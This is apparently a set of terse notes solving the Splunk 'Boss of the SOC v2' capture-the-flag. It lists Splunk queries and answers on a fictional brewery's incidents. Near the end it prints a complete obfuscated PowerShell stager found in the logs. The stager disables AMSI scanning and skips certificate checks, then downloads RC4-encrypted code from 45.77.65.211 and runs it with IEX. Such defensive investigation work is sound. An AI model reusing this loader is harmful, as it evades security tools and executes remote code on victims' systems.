
v2
Count all events
index="botsv2" amber
index="botsv2" sourcetype="pan:traffic"
10.0.2.101
71.39.18.125
index="botsv2" Amber src_user="frothly.local\amber.turing" | reverse
index="botsv2" 10.0.2.101 *beer* sourcetype="stream:HTTP" | dedup site | table _time site
index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" www.berkbeer.com | table _time uri_path
index="botsv2" *berk* "method{}"=MAIL
index="botsv2" mberk@berkbeer.com
index="botsv2" aturing@froth.ly
index="botsv2" | search "Heinz Bernhard Contact Information"
ambersthebest@yeastiebeastie.com
Amber Turing
mberk@berkbeer.com
Martin Berk
aturing@froth.ly
Amber Turing
hbernhard@berkbeer.com
Heinz Bernhard

index="botsv2" Amber TOR
index="botsv2" brewertalk.com
index="botsv2" brewertalk.com http_comment="HTTP/1.1 404 Not Found" | table _time src_ip src_header uri_path http_method | stats count by src_ip
45.77.65.211
index="botsv2" 52.42.208.228 | stats count by uri_path
index="botsv2" 52.42.208.228 | dedup form_data | table form_data
kIagerfield
index="botsv2" member.php SQL | stats count by form_data
index="botsv2" kevin | dedup cookie | table cookie src_ip dest_ip
300 series questions
index="botsv2" Mallory .pptx | dedup filename | table _time filename
index="botsv2" host="MACLORY-AIR13" .pptx
/Volumes//FROTHLY/Home/mallory.kraeusen/Frothly_marketing_campaign_Q317.pptx
/Users/mallorykraeusen/Documents/
index="botsv2" Mallory .crypt | dedup filename | table _time filename
index="botsv2" .mkv
index="botsv2" host="MACLORY-AIR13" ".crypt" sourcetype=ps
index="botsv2" kutekitten | search vendor action=added
columns.vendor_id
Google that ID
index="botsv2" kutekitten.local mkraeusen | dedup columns.md5 | table columns.name columns.path columns.value name columns.cmdline columns.md5
befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271
72d4d364ed91dd9418d144a2db837a6d
index="botsv2" befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271
/Users/mkraeusen/Downloads/Important_HR_INFO_for_mkraeusen
Last 2 are here:
400x series questions
index=botsv2 *.zip
C:\Users\billy.tun\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\4RND1WK1\invoice.zip
2017-08-24 03:27:29.947
index=botsv2 invoice.zip
check email content
index=botsv2 SSL app=ssl
ssl_issuer
index=botsv2 Frothly winsys32.dll
[Ref].AsSEmbLY.GetTYPE('System.Management.Automation.AmsiUtils')|? {
$_
}
|% {
$_.GeTFIeLd('amsiInitFailed', 'NonPublic,Static').SEtVaLUE($nULl, $TRuE)
};
[SYstem.NEt.SERvICEPOInTMAnagER]::EXPEct100ContiNue = 0;
$wC = NEW - ObjECt SYsTeM.NeT.WEbCliEnt;
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {
$true
};
$wc.HeAdeRS.AdD('User-Agent', $u);
$WC.Proxy = [SySTEm.Net.WeBREQUeSt]::DEfAulTWeBProxY;
$Wc.PROxy.CReDeNtIalS = [SystEm.NEt.CrEdEntiaLCacHe]::DeFAuLtNetWORkCREDeNtIAls;
$K = [SystEm.Text.EncODIng]::ASCII.GeTByTeS('389288edd78e8ea2f54946d3209b16b8');
$R = {
$D, $K = $ARgs;
$S = 0..255;
0..255|% {
$J = ($J + $S[$_] + $K[$_%$K.CouNt])%256;
$S[$_], $S[$J] = $S[$J], $S[$_]
};
$D|% {
$I = ($I + 1)%256;
$H = ($H + $S[$I])%256;
$S[$I], $S[$H] = $S[$H], $S[$I];
$_ - BxOR$S[($S[$I] + $S[$H])%256]
}
};
$wc.HeadERs.ADd("Cookie", "session=lrtRHKkA6IL5h/d8Ekk6QsxyPvk=");
$ser = 'https://45.77.65.211:443';
$t = '/admin/get.php';
$DATA = $WC.DoWNLoaDDATA($SER + $T);
$iV = $DAta[0..3];
$DatA = $dATa[4..$DaTa.lENGTh];
- JoIN[CHar[]](& $R $daTa ($IV + $K))|IEX
index="botsv2" winsys32.dll
Shows what program is used
index="botsv2" sourcetype="stream:ftp"
Shows used program activity
index="botsv2" sourcetype="stream:ftp" method=RETR | dedup filename | table filename
Will expose the filename
Last updated